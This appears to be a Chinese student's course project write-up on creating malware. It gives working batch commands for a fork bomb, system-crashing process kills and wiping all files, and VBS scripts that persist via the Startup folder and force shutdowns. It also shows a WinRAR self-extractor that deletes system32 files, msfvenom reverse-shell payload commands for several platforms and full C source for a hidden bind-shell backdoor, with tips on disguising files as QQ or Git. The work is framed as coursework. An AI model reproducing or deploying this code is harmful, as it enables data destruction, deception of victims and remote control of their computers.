20155326《网络对抗》免考项目——恶意代码的研究与深入分析之恶意代码的生成

病毒的几种制作方法

计算机病毒的制作方法有很多,这里重点介绍三种方法。

通过创建批处理

批处理(Batch).也称为批处理脚本。顾名思义,批处理就是对某对象进行批量的处理。批处理文件的扩展名为bat。批处理是一种简化的脚本语言.也称作宏。它应用于Dos和windOW$系统中。它是由DOS或者Windows系统内嵌的命令解释器(通常是command.corn或者cmd exe)解释运行。类似于Unix中的Shell脚本。

批处理最简单的应用是逐行书写在命令行中会用到的各种命令。更复杂的情况.需要使用玎.for、goto等命令控制程序的运行过程.如同C、Basle等中高级语言一样。如果需要实现更复杂的应用.利用外部程序是必要的.这包括系统本身提供的外部命令和第三方提供的工具或者软件。批处理文件,或称为批处理程序,是由一条条的DOS命令组成的普通文本文件.可以用记事本直接编辑或用DOS命令创建,也可以用DOS下的文本编辑器Edit.exe来编辑。在“命令提示”下键人批处理文件的名称.或者双击该批处理文件.系统就会调用cmd.既e运行该批处理程序。一般情况下.每条命令占据一行;当然也可以将多条命令用特定符号(如:&、&&、I、II等)分隔后写入同一行中:还有的情况就是像订、for等较高级的命令则要占据几行甚至几百行的空间。系统在解释运行批处理程序时,首先扫描整个批处理程序,然后从第一行代码开始向下逐句执行所有的命令.直至程序结尾或遇见exit命令或出错意外退出。最简单的方法是用“copycon主文件名.bat”来创建bat文件,在创建完后按CTRLvZ键来结束。但这种方法的缺点是只能写,不能改。其常指令有:Call,Echo、For、Cow、If、Pause、Rem多种。

这个的原理就是,点击.bat文件,会自动在cmd中运行文件中的代码,所以只需在代码中加入攻击元素,便会达到攻击效果。

  • Restara病毒制作

Restara是一款可以让计算机重启的病毒,这种病毒运行后,计算机会重启,正在编辑的数据可能会全部消失。

这里我们通过创建批处理来制作一个病毒。

新建一个记事本,在记事本里输入:shutdown /r,注意空格。

点击“另存为”,选择保存类型为“所有文件”,更改文件名为“腾讯QQ”,然后保存在桌面。

右键——创建快捷方式,然后右键快捷方式——属性。

点击更改图标

点击浏览,选择.ico文件。

搜索我本机里面的qq.ico,选择后发现他是一个不可用的,好吧,我自己下载了一个low版的qq图标。

之后点击确定。

点击查看冒牌的“腾讯QQ快捷方式”,右键——属性,选择隐藏后保存

这时一个restart病毒就做好啦,为了防止我的虚拟机坏掉,我快速的在运行他之前给虚拟机来了一个快照。

点击运行我的小病毒,果然,首先他在cmd命令下自动输入了自动关机之前记事本里面的语句(太快了,我试了好几遍都没抓到打开的cmd窗口),然后电脑发出警告,将在一分钟之内关机

然后我发现他隐藏的还是不够完美,于是我将它名字直接改成了腾讯QQ,嘻嘻,除了这个.ico有点出戏以外看着还是蛮真的。我可以把它拷到别人的电脑上,然后当他一不小心点击以后便会遭到攻击。

接下来按照同样的方法,我们制作几个不同功能能的小病毒:

1、重复执行某条命令直至死机的批处理代码:

start cmd
%0

这次我们做成Git软件的样子,制作完成后记得隐藏.bat文件。

由于它具有攻击性,所以我将他拷到我的虚拟机中进行试验。哇这个,太猛了,我的虚拟机不停地弹窗口出来,也不能选择关机,电脑开始发热,最后只能选择在360小助手中结束了vm的进程。

受到上一个的惊吓,我决定不演示下面的病毒了,给出代码让大家看看就好。

2、复制一个文件的磁盘的每个子文件夹当中

for /r /d %a in (*)  do copy test.txt "%a" /y

3、不停地执行同一条命令

for /l %a in (1,0,2) do net send 192.168.1.1 "×××来了!"

4、死机,蓝屏

ntsd -c q -pn winlogon.exe(蓝屏重启)

ntsd -c q -pn csrss.exe(死机)

5、创建无法删除的特殊名字文件夹

md \\.\c:\con
md \\.\c:\aux

6、创建无法双击打开无法删除的另类文件夹

md test..\
rd test..\ /s /d

7、注销

rundll32.exe user32.dll LockWorkStation

8、删除磁盘所有文件

del * /a /q /f

通过vbs代码

VBS脚本病毒是使用VBScript编写。以宏病毒和新欢乐时光病毒为典型代表的VBS脚本病毒十分的猖獗,很重要的一个原因就是其编写简单,使用VBScript编写。他的攻击方式和批处理相似。

新建一个文本文档,输入以下代码

PS:代码里面WScript.Shell是WshShell对象的ProgID,创建WshShell对象可以运行程序、操作注册表、创建快捷方式、访问系统文件夹、管理环境变量。

然后把它的后缀名改成.vbs

时你只要双击,就可以看到你的vbs文件运行了,也就是说你已经成功创作!!!

将弹出的对话框删掉,会出现下面的新对话框,叉掉后又有新的出来,反复循环,是关不掉的。这是貌似只能按照他的要求输入。

好吧,没有在两分钟之内输入*是猪,于是他关机重启了。

开机后,我们再来看看他的一次完整整蛊是什么样。

尝试将他中途关掉,我打开任务管理器,准备结束这个应用程序,结果如下:

我关了这个又自动弹开了另一个,真是拿他没有办法,所以我又一次被动关机重启了电脑。

看来我的这个小程序还是比较强的呀嘻嘻。

接下来再来几个骚扰型小病毒啦啦啦

  • 无尽语音报数:

无限语音从1数到无限大。

在新建txt里面输入下面代码,之后改变其后缀为.vbs,运行来看看。

Set s = CreateObject("sapi.spvoice") 
i=0 
do 
s.speak i 
i=i+1 
loop 

没办法把音频放上来就来个这个假装有声音吧。

  • 无尽刷新

慎用,如此刷新打开任务管理器都难,只能拔掉电源。

set ws=createobject("wscript.shell") 
do 
ws.sendkeys "{f5}" 
loop 

好吧,点击了以后我的电脑无法自理了。。。重启+1

  • 修改注册表:

    on error resume next
    set wr=createobject("scripting.filesystemobject")
    set ws=createobject("wscript.shell")
    set f = wr.getfile(wscript.scriptfullname)
    q=ws.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup")
    if not f="Win32.vbs" then wr.copyfile f,q&"\Win32.vbs",true
    ws.run"shutdown -p",vbhide

这应该是启动的意思,让我们来看看效果。

叮咚一声脆响,我的电脑又关机了。实践告诉我,这是启动关机。还可以使用其他的语句来达到你的攻击效果。

当我想尝试下一个小病毒时发现我的电脑已经挂掉了,一开机就会关机,多一秒让我看看熟悉的开机主页面机会都不给。还好我有快照!哈哈哈

  • QQ信息骚扰恶搞:

打开好友的聊天对话框,然后记下聊天对话框的名称(如图:"28754857"),填到代码中。代码中的“10”代表发送次数,把10修改一下就可以自定义发送QQ信息到好友的次数。把发送的内容“复制”即可,当打开本vbs的时候就会把剪切板里的内容粘贴发送过去。

On Error Resume Next 
Dim wsh,ye 
set wsh=createobject("wscript.shell") 
for i=1 to 10 
wscript.sleep 700 
wsh.AppActivate("28754857") 
wsh.sendKeys "^v" 
wsh.sendKeys i 
wsh.sendKeys "%s" 
next 
wscript.quit

PS:这里"28754857"是我的qq里面的一个联系人的备注名称。
按之前步骤,调整格式后,点击它看看会发生什么。

很奇怪,只发送了后几次。再次尝试后发现了他的正确使用方法:在点击这个骚扰病毒后,马上和对方发消息,然后骚扰信息就会全发送给对方啦。

使用WinRAR

前两种制造病毒的方法都会用到一些编程工具代码等,下面这种用WinRAR快速简单制作一个破坏系统的病毒,不需要任何代码。

WinRAR我想大家都不会陌生,一款非常常用的压缩软件,。

首先打开WinRAR,点击【添加】把文件添加到压缩文件中,点击【常规】创建自解压格式压缩文件

选择 高级——自解压选项

高级自解压选项【常规】解压路径,输入:%windir%\system32 或 C:\Windows\system32。

选择 模式——全部隐藏。

点击 高级——目标文件夹中要删除的文件,输入:.

在 更新——更新方式,选择仅更新已经存在的文件,覆盖方式选择跳过已经在的文件

最后点击确定,生成了.exe文件。

这文件看着没有问题,但运行后就会破坏系统文件,所以理论上在运行后杀毒软件等就会进行拦截了。

运行后破坏系统文件,一开始运行后不会有什么反应,但重启电脑后就会发现系统提示文件丢失损坏。

由于我的win7虚拟机里面没有WinRAR,我又不敢在我的主机里面做,就暂且不足测试了。放一个别人的测试结果。

看到了这个评论,哈哈哈哈哈,更加坚定了我不手贱在我主机试毒。

利用Metasploi生成后门

Metasploit生成各种格式的后门。除了之前实验二生成的.exe(Windows下的后门),还有Linux环境下的后门、PHP后门、java后门、Android后门,以及shellcode等等。具体生成各种类型的后门的操作如下:

Linux下的后门

操作方法与Windows后门类似,输入msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.146.129 LPORT=5326 x> 20155326_backdoor生成木马。

与windows系统唯一的区别是,在linux下生成的木马需要通过使用命令chmod +x 程序名赋予可执行的权限。

执行时使用./程序名即可。

生成Java后门程序

Java程序在windows下和在linux下都可以生效执行。使用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.146.129 lport=5326 x> 20155326_backdoor.jar生成木马。

生成PHP后门程序

使用msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.146.129 lport=5326 x> 20155326_backdoor.php生成木马。

把生成的木马php文件放到网站上面,当别人访问的时候就会执行。

生成Android后门程序

使用msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.146.129 lport=5326 x> 20155326_backdoor.apk生成木马。

此时的木马是apk安装包形式,诱导用户点击此安装包,就会执行。

生成shellcode

使用msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.146.129 lport=5326 -f c生成一段shellcode。

将此shellcode写入可执行文件,执行时就会回连攻击机。

木马的生成

木马程序原理

木马病毒的工作原理:一个完整的特洛伊木马套装程序含了两部分:服务端(服务器部分)和客户端(控制器部分)。植入对方电脑的是服务端,而黑客正是利用客户端进入运行了服务端的电脑。运行了木马程序的服务端以后,会产生一个有着容易迷惑用户的名称的进程,暗中打开端口,向指定地点发送数据(如网络游戏的密码,即时通信软件密码和用户上网密码等),黑客甚至可以利用这些打开的端口进入电脑系统。

常见的编程技术

修改注册表技术
多线程技术
后台监控技术
定时触发技术

木马编写

首先先在CB中新建一个Win32 Console Application工程。

写程序的时候我们需要想一下要实现那些功能,写木马同样一样,首先我准备写一个后门型木马,主要的功能就是给我们开一个端口,让我们使用Telnet命令连接上去,从而控制目标计算机,作为木马,我们当然还需要隐藏自己。

代码如下:



#pragma comment(lib,"ws2_32.lib")  //这里我们静态加入一个lib文件,也就是ws2_32.lib</font>
#pragma comment(linker,"/subsystem:\"windows\"/entry:\"mainCRTStartup\"") //设置连接器选项
#include <winsock2.h> //包含头文件winsock2.h,这个是 windows socket的头文件
#include <windows.h> //常用的,不解释
#define MasterPort 5326 //定义一个常量,也就是我们后面要打开的端口
#include <stdio.h>
#include <stdlib.h>

int main()//主函数不解释
{
WSADATA WSADa;//这个结构被用来存储被WSAStartup函数调用后返回的Windows Sockets数据。后面的基本上差不多就不解释,不懂请大家自行百度
struct sockaddr_in SockAddrIn;
SOCKET CSocket,SSocket;
int iAddrSize;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
char szCMDPath[255];
//分配内存,初始化数据
ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
ZeroMemory(&WSADa,sizeof(WSADATA));
//获取cmd路径
GetEnvironmentVariable("COMSPEG",szCMDPath,sizeof(szCMDPath));
//加载ws2_32.dll
WSAStartup(0x0202,&WSADa);
//设置本地信息和绑定协议,建立socket,代码如下:
SockAddrIn.sin_family = AF_INET;
SockAddrIn.sin_addr.s_addr = INADDR_ANY;
SockAddrIn.sin_port = htons(MasterPort);
CSocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
//设置绑定端口999
bind(CSocket,(SOCKADDR *)&SockAddrIn,sizeof(SockAddrIn));
//设置服务器端监听端口
listen(CSocket,1);
iAddrSize = sizeof(SockAddrIn);
//开始连接远程服务器,并配置隐藏窗口结构体
SSocket = accept(CSocket,(SOCKADDR *)&SockAddrIn,&iAddrSize);
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE;
StartupInfo.dwFlags = STARTF_USESTDHANDLES |
STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)SSocket;
StartupInfo.hStdOutput = (HANDLE)SSocket;
StartupInfo.hStdError = (HANDLE)SSocket;
//创建匿名管道:
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
//关闭进程句柄:
closesocket(CSocket);
closesocket(SSocket);
WSACleanup();
//关闭连接卸载ws2_32.dll
return 0;
}

        

建立CSocket开始,然后绑定端口5326,接下来监听这个端口,然后接收来自客户端的命令,最后关闭这个CSocket。这是一个比较简单的正向连接后门程序。这个程序之所以说比较简单,是因为系统重启这个木马就会被清除了。因为并没有添加进系统启动项,隐藏进程。

接下来我们就将编译好的木马放在测试机上进行测试,可以发现运行程序并没有什么事情发生。

输入netstat -an 查看端口状况,发现程序已经在默默的在运行,而且打开了5326端口。

总结

这里我做了好多小病毒,在运行过程中并没有报毒,试想一下我将这些小病毒通过微信、邮件、U盘拷贝等方式传播出去,人们在不知情的情况下点击它,会产生什么影响,如果只是一些恶作剧还好,要是修改了注册表、执行了一些恶意操作,后果是不堪设想的。后门的制作我偏向于生成,没有详细展示他的攻击效果。